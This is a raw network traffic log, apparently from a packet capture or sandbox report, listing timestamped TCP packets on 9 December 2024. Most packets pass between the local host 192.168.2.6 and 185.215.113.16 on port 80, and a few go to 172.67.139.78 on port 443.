                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.857177019 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.857966900 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858005047 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858078003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858113050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858367920 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858403921 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858911991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.858949900 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859030008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859069109 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859714031 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859750032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859873056 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.859910965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.860677004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.860733032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.860838890 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.860876083 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.861476898 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.861515999 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.861582041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.861617088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.862312078 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.862349987 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.862814903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.862850904 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.863399982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.863435030 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.863590002 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.863625050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864061117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864111900 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864381075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864420891 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864876986 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.864914894 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.865024090 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.865055084 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.865752935 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.865784883 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.865994930 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.866036892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.866640091 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.866676092 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867117882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867155075 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867662907 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867674112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867701054 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.867701054 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.868429899 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.868443012 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.868463993 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.868489981 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.869177103 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.869215965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.869342089 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.869379997 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870035887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870071888 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870301008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870342016 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870944977 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.870955944 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.871006966 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.871781111 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.871824026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872297049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872335911 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872649908 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872709036 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872817039 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.872853994 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.873627901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.873665094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.873671055 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.873698950 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.874382973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.874437094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.874975920 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.875017881 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.875238895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.875281096 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.875391006 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.875430107 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.876138926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.876178026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.876183987 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.876218081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877065897 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877080917 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877103090 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877119064 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877868891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877881050 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877907991 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.877918005 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.878731012 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.878753901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.878770113 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.878787994 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.879729033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.879770041 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.879848957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.879885912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.880409956 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.880449057 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.880911112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.880949974 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.881361008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.881371975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.881398916 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.881411076 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.882139921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.882183075 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.882201910 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.882240057 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.882994890 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.883007050 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.883033037 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.883048058 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.883771896 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.883807898 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955210924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955271959 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955349922 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955390930 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955636978 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955672026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955812931 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.955851078 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.956592083 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.956633091 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.956901073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.956945896 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.957386017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.957423925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.957585096 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.957689047 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.958235979 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.958275080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.958475113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.958515882 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.959099054 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.959139109 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.959265947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.959316015 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960011005 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960051060 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960158110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960197926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960886955 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960897923 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960927010 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.960947037 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.961658955 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.961707115 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.961822033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.961862087 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.962577105 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.962618113 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.963116884 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.963160038 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.025703907 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.025734901 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.025816917 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.026097059 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.026108980 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.040780067 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.040862083 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.040935993 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.040985107 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.041224957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.041238070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.041265965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.041281939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042032957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042073011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042169094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042206049 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042920113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.042958021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.043107033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.043143988 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.043715954 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.043756962 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.043977022 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.044013977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.044568062 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.044610023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.044678926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.044715881 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.045562029 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.045574903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.045604944 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.045619965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.046297073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.046338081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.046508074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.046547890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.047194004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.047209024 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.047233105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.047262907 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.047996044 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.048037052 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.048327923 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.048365116 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.048959017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.048998117 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.049031019 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.049062014 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.049778938 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.049815893 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050276041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050312996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050693989 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050705910 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050731897 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.050740957 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.051593065 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.051647902 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.051701069 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.051738977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.052365065 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.052402973 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.052584887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.052620888 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.053221941 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.053261042 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.053409100 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.053443909 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054054022 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054092884 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054246902 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054277897 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054914951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.054959059 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055020094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055054903 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055921078 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055932999 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055958986 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.055969000 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.056862116 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.056907892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057060957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057105064 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057571888 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057610035 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057759047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.057797909 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.058429003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.058440924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.058470011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.059247017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.059288025 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.059453964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.059493065 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.060137033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.060172081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.060506105 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.060540915 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.061002016 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.061038017 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.061769009 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.061814070 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.062024117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.062035084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.062073946 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.062680006 CET8049898185.215.113.16192.168.2.6
